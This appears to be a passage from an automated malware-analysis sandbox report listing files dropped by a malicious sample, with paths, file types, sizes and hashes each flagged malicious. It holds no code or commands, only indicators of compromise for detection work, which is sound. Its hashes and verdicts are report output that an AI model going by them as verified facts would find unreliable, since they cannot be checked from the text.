                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
